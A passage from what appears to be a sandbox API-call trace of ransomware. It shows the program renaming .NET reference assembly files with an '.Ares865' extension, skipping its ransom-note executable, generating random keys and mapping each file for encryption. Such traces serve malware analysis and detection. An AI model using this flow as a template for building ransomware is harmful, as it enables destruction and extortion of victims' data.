dwFlags=0x0) returned 1 [0124.479] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x509300, lpName=0x0) returned 0x170 [0124.481] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x109300) returned 0x3030000 [0124.778] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.779] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.779] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.798] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PresentationFramework.Luna.dll" | out: lpString1="PresentationFramework.Luna.dll") returned="PresentationFramework.Luna.dll" [0124.799] lstrlenW (lpString="PresentationFramework.Luna.dll") returned 30 [0124.799] lstrlenW (lpString="Ares865") returned 7 [0124.799] lstrcmpiW (lpString1="una.dll", lpString2="Ares865") returned 1 [0124.799] lstrlenW (lpString=".dll") returned 4 [0124.799] lstrcmpiW (lpString1="PresentationFramework.Luna.dll", lpString2=".dll") returned 1 [0124.799] lstrlenW (lpString=".lnk") returned 4 [0124.799] lstrcmpiW (lpString1="PresentationFramework.Luna.dll", lpString2=".lnk") returned 1 [0124.799] lstrlenW (lpString=".ini") returned 4 [0124.799] lstrcmpiW (lpString1="PresentationFramework.Luna.dll", lpString2=".ini") returned 1 [0124.799] lstrlenW (lpString=".sys") returned 4 [0124.799] lstrcmpiW (lpString1="PresentationFramework.Luna.dll", lpString2=".sys") returned 1 [0124.799] lstrlenW (lpString="PresentationFramework.Luna.dll") returned 30 [0124.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.Ares865") returned 107 [0124.799] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll.ares865"), dwFlags=0x1) returned 1 [0124.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=397312) returned 1 [0124.802] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.803] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x61300, lpName=0x0) returned 0x170 [0124.813] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61300) returned 0x420000 [0124.829] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.830] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.830] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.836] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PresentationFramework.Royale.dll" | out: lpString1="PresentationFramework.Royale.dll") returned="PresentationFramework.Royale.dll" [0124.836] lstrlenW (lpString="PresentationFramework.Royale.dll") returned 32 [0124.836] lstrlenW (lpString="Ares865") returned 7 [0124.836] lstrcmpiW (lpString1="ale.dll", lpString2="Ares865") returned -1 [0124.836] lstrlenW (lpString=".dll") returned 4 [0124.836] lstrcmpiW (lpString1="PresentationFramework.Royale.dll", lpString2=".dll") returned 1 [0124.836] lstrlenW (lpString=".lnk") returned 4 [0124.836] lstrcmpiW (lpString1="PresentationFramework.Royale.dll", lpString2=".lnk") returned 1 [0124.836] lstrlenW (lpString=".ini") returned 4 [0124.836] lstrcmpiW (lpString1="PresentationFramework.Royale.dll", lpString2=".ini") returned 1 [0124.836] lstrlenW (lpString=".sys") returned 4 [0124.836] lstrcmpiW (lpString1="PresentationFramework.Royale.dll", lpString2=".sys") returned 1 [0124.836] lstrlenW (lpString="PresentationFramework.Royale.dll") returned 32 [0124.836] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.Ares865") returned 109 [0124.836] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll.ares865"), dwFlags=0x1) returned 1 [0124.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.839] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=163840) returned 1 [0124.839] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.840] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x28300, lpName=0x0) returned 0x170 [0124.842] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28300) returned 0x420000 [0124.849] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.850] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.850] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.853] lstrcpyW (in: lpString1=0x2cce48a, lpString2="ReachFramework.dll" | out: lpString1="ReachFramework.dll") returned="ReachFramework.dll" [0124.853] lstrlenW (lpString="ReachFramework.dll") returned 18 [0124.853] lstrlenW (lpString="Ares865") returned 7 [0124.853] lstrcmpiW (lpString1="ork.dll", lpString2="Ares865") returned 1 [0124.853] lstrlenW (lpString=".dll") returned 4 [0124.853] lstrcmpiW (lpString1="ReachFramework.dll", lpString2=".dll") returned 1 [0124.853] lstrlenW (lpString=".lnk") returned 4 [0124.853] lstrcmpiW (lpString1="ReachFramework.dll", lpString2=".lnk") returned 1 [0124.853] lstrlenW (lpString=".ini") returned 4 [0124.853] lstrcmpiW (lpString1="ReachFramework.dll", lpString2=".ini") returned 1 [0124.853] lstrlenW (lpString=".sys") returned 4 [0124.853] lstrcmpiW (lpString1="ReachFramework.dll", lpString2=".sys") returned 1 [0124.853] lstrlenW (lpString="ReachFramework.dll") returned 18 [0124.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.Ares865") returned 95 [0124.854] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll.ares865"), dwFlags=0x1) returned 1 [0124.855] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.856] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=532480) returned 1 [0124.856] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.857] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.857] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.857] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x82300, lpName=0x0) returned 0x170 [0124.858] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x82300) returned 0x420000 [0124.879] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.880] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.880] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.887] lstrcpyW (in: lpString1=0x2cce48a, lpString2="RedistList" | out: lpString1="RedistList") returned="RedistList" [0124.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0124.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x320fc8 [0124.887] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0124.887] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5230b460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5230b460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SubsetList", cAlternateFileName="SUBSET~1")) returned 1 [0124.887] lstrcmpiW (lpString1="SubsetList", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0124.887] lstrcmpiW (lpString1="SubsetList", lpString2="aoldtz.exe") returned 1 [0124.888] lstrcpyW (in: lpString1=0x2cce48a, lpString2="SubsetList" | out: lpString1="SubsetList") returned="SubsetList" [0124.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0124.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321070 [0124.888] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0124.888] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46093ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb46093ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb46093ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.IdentityModel.dll", cAlternateFileName="")) returned 1 [0124.888] lstrcmpiW (lpString1="System.IdentityModel.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0124.888] lstrcmpiW (lpString1="System.IdentityModel.dll", lpString2="aoldtz.exe") returned 1 [0124.888] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.IdentityModel.dll" | out: lpString1="System.IdentityModel.dll") returned="System.IdentityModel.dll" [0124.888] lstrlenW (lpString="System.IdentityModel.dll") returned 24 [0124.888] lstrlenW (lpString="Ares865") returned 7 [0124.888] lstrcmpiW (lpString1="del.dll", lpString2="Ares865") returned 1 [0124.888] lstrlenW (lpString=".dll") returned 4 [0124.888] lstrcmpiW (lpString1="System.IdentityModel.dll", lpString2=".dll") returned 1 [0124.888] lstrlenW (lpString=".lnk") returned 4 [0124.888] lstrcmpiW (lpString1="System.IdentityModel.dll", lpString2=".lnk") returned 1 [0124.888] lstrlenW (lpString=".ini") returned 4 [0124.888] lstrcmpiW (lpString1="System.IdentityModel.dll", lpString2=".ini") returned 1 [0124.888] lstrlenW (lpString=".sys") returned 4 [0124.888] lstrcmpiW (lpString1="System.IdentityModel.dll", lpString2=".sys") returned 1 [0124.888] lstrlenW (lpString="System.IdentityModel.dll") returned 24 [0124.889] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.Ares865") returned 101 [0124.889] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll.ares865"), dwFlags=0x1) returned 1 [0124.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.891] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=442368) returned 1 [0124.891] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.892] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.892] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.892] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c300, lpName=0x0) returned 0x170 [0124.893] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c300) returned 0x420000 [0124.914] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.914] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.914] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.921] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.IdentityModel.Selectors.dll" | out: lpString1="System.IdentityModel.Selectors.dll") returned="System.IdentityModel.Selectors.dll" [0124.921] lstrlenW (lpString="System.IdentityModel.Selectors.dll") returned 34 [0124.921] lstrlenW (lpString="Ares865") returned 7 [0124.921] lstrcmpiW (lpString1="ors.dll", lpString2="Ares865") returned 1 [0124.921] lstrlenW (lpString=".dll") returned 4 [0124.921] lstrcmpiW (lpString1="System.IdentityModel.Selectors.dll", lpString2=".dll") returned 1 [0124.921] lstrlenW (lpString=".lnk") returned 4 [0124.921] lstrcmpiW (lpString1="System.IdentityModel.Selectors.dll", lpString2=".lnk") returned 1 [0124.921] lstrlenW (lpString=".ini") returned 4 [0124.921] lstrcmpiW (lpString1="System.IdentityModel.Selectors.dll", lpString2=".ini") returned 1 [0124.921] lstrlenW (lpString=".sys") returned 4 [0124.922] lstrcmpiW (lpString1="System.IdentityModel.Selectors.dll", lpString2=".sys") returned 1 [0124.922] lstrlenW (lpString="System.IdentityModel.Selectors.dll") returned 34 [0124.922] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.Ares865") returned 111 [0124.922] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll.ares865"), dwFlags=0x1) returned 1 [0124.924] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.924] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=126976) returned 1 [0124.924] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.925] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.925] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.925] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f300, lpName=0x0) returned 0x170 [0124.927] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f300) returned 0x190000 [0124.932] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.933] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.933] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.935] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.IO.Log.dll" | out: lpString1="System.IO.Log.dll") returned="System.IO.Log.dll" [0124.935] lstrlenW (lpString="System.IO.Log.dll") returned 17 [0124.935] lstrlenW (lpString="Ares865") returned 7 [0124.935] lstrcmpiW (lpString1="Log.dll", lpString2="Ares865") returned 1 [0124.935] lstrlenW (lpString=".dll") returned 4 [0124.935] lstrcmpiW (lpString1="System.IO.Log.dll", lpString2=".dll") returned 1 [0124.935] lstrlenW (lpString=".lnk") returned 4 [0124.935] lstrcmpiW (lpString1="System.IO.Log.dll", lpString2=".lnk") returned 1 [0124.936] lstrlenW (lpString=".ini") returned 4 [0124.936] lstrcmpiW (lpString1="System.IO.Log.dll", lpString2=".ini") returned 1 [0124.936] lstrlenW (lpString=".sys") returned 4 [0124.936] lstrcmpiW (lpString1="System.IO.Log.dll", lpString2=".sys") returned 1 [0124.936] lstrlenW (lpString="System.IO.Log.dll") returned 17 [0124.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.Ares865") returned 94 [0124.936] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll.ares865"), dwFlags=0x1) returned 1 [0124.938] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.938] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131072) returned 1 [0124.938] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.939] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.939] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.939] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20300, lpName=0x0) returned 0x170 [0124.941] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20300) returned 0x420000 [0124.947] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.950] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Printing.dll" | out: lpString1="System.Printing.dll") returned="System.Printing.dll" [0124.950] lstrlenW (lpString="System.Printing.dll") returned 19 [0124.950] lstrlenW (lpString="Ares865") returned 7 [0124.950] lstrcmpiW (lpString1="ing.dll", lpString2="Ares865") returned 1 [0124.950] lstrlenW (lpString=".dll") returned 4 [0124.950] lstrcmpiW (lpString1="System.Printing.dll", lpString2=".dll") returned 1 [0124.950] lstrlenW (lpString=".lnk") returned 4 [0124.950] lstrcmpiW (lpString1="System.Printing.dll", lpString2=".lnk") returned 1 [0124.950] lstrlenW (lpString=".ini") returned 4 [0124.950] lstrcmpiW (lpString1="System.Printing.dll", lpString2=".ini") returned 1 [0124.950] lstrlenW (lpString=".sys") returned 4 [0124.950] lstrcmpiW (lpString1="System.Printing.dll", lpString2=".sys") returned 1 [0124.950] lstrlenW (lpString="System.Printing.dll") returned 19 [0124.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.Ares865") returned 96 [0124.950] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll.ares865"), dwFlags=0x1) returned 1 [0124.952] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.952] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=372736) returned 1 [0124.953] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.953] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.953] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.953] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5b300, lpName=0x0) returned 0x170 [0124.955] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b300) returned 0x420000 [0124.973] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.974] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.974] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.980] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Runtime.Serialization.dll" | out: lpString1="System.Runtime.Serialization.dll") returned="System.Runtime.Serialization.dll" [0124.980] lstrlenW (lpString="System.Runtime.Serialization.dll") returned 32 [0124.980] lstrlenW (lpString="Ares865") returned 7 [0124.980] lstrcmpiW (lpString1="ion.dll", lpString2="Ares865") returned 1 [0124.980] lstrlenW (lpString=".dll") returned 4 [0124.980] lstrcmpiW (lpString1="System.Runtime.Serialization.dll", lpString2=".dll") returned 1 [0124.980] lstrlenW (lpString=".lnk") returned 4 [0124.980] lstrcmpiW (lpString1="System.Runtime.Serialization.dll", lpString2=".lnk") returned 1 [0124.980] lstrlenW (lpString=".ini") returned 4 [0124.980] lstrcmpiW 